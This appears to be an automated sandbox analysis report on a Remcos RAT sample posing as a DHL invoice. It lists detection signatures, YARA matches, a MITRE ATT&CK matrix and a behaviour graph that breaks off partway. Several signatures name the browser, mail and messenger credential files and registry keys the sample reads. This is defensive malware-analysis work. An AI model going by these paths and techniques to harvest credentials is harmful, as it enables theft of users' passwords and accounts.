                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 21_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,21_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0041B69E GetUserNameW,23_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 23_2_0044942D _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,23_2_0044942D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 29_2_0041739B GetVersionExW,29_2_0041739B
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED
                    Contains functionality to steal Chrome passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data23_2_0040BA4D
                    Contains functionality to steal Firefox passwords or cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\23_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db23_2_0040BB6B
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Tries to steal Instant Messenger accounts or passwords
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Tries to steal Mail credentials (via file registry)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: ESMTPPassword30_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword30_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword30_2_00402DB3

                    Remote Access Functionality

                    barindex
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 23.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.1ab996e87d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1e3b1478da0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 26.2.powershell.exe.1c222be89d8.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 35.2.powershell.exe.1a8905a8228.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 40.2.powershell.exe.1b33d0e6cd0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2364592750.000001E3B1150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2290132644.000001AB99541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000028.00000002.2788200178.000001B33CDBE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.2563409063.000001A890401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001A.00000002.2531838956.000001C222A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7820, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kanspt.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe23_2_0040569A

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information321
                    Scripting                    		Valid Accounts11
                    Native API                    		321
                    Scripting                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		1
                    Exfiltration Over Alternative Protocol                    		1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution                    		1
                    DLL Side-Loading                    		1
                    Bypass User Account Control                    		1
                    Deobfuscate/Decode Files or Information                    		211
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts32
                    Command and Scripting Interpreter                    		1
                    Windows Service                    		1
                    Access Token Manipulation                    		3
                    Obfuscated Files or Information                    		2
                    Credentials in Registry                    		1
                    System Service Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		21
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution                    		21
                    Registry Run Keys / Startup Folder                    		1
                    Windows Service                    		2
                    Software Packing                    		3
                    Credentials In Files                    		4
                    File and Directory Discovery                    		Distributed Component Object Model211
                    Input Capture                    		1
                    Non-Standard Port                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell                    		Network Logon Script322
                    Process Injection                    		1
                    DLL Side-Loading                    		LSA Secrets38
                    System Information Discovery                    		SSH3
                    Clipboard Data                    		2
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                    Registry Run Keys / Startup Folder                    		1
                    Bypass User Account Control                    		Cached Domain Credentials131
                    Security Software Discovery                    		VNCGUI Input Capture213
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion                    		DCSync21
                    Virtualization/Sandbox Evasion                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading                    		Proc Filesystem4
                    Process Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Virtualization/Sandbox Evasion                    		/etc/passwd and /etc/shadow1
                    Application Window Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation                    		Network Sniffing1
                    System Owner/User Discovery                    		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd322
                    Process Injection                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539088 Sample: DHLShippingInvoicesAwbBL000... Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 90 pastebin.com 2->90 92 paste.ee 2->92 94 5 other IPs or domains 2->94 106 Multi AV Scanner detection for domain / URL 2->106 108 Suricata IDS alerts for network traffic 2->108 110 Found malware configuration 2->110 114 18 other signatures 2->114 11 wscript.exe 1 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        18 2 other processes 2->18 signatures3 112 Connects to a pastebin service (likely for C&C) 92->112 process4 signatures5 140 VBScript performs obfuscated calls to suspicious functions 11->140 142 Suspicious powershell command line found 11->142 144 Wscript starts Powershell (via cmd or directly) 11->144 146 2 other signatures 11->146 20 powershell.exe 7 11->20         started        23 powershell.exe 14->23         started        25 conhost.exe 14->25         started        27 powershell.exe 16->27         started        29 conhost.exe 16->29         started        31 powershell.exe 18->31         started        33 powershell.exe 18->33         started        35 conhost.exe 18->35         started        37 conhost.exe 18->37         started        process6 signatures7 116 Suspicious powershell command line found 20->116 118 Self deletion via cmd or bat file 20->118 120 Tries to download and execute files (via powershell) 20->120 126 3 other signatures 20->126 39 powershell.exe 14 19 20->39         started        44 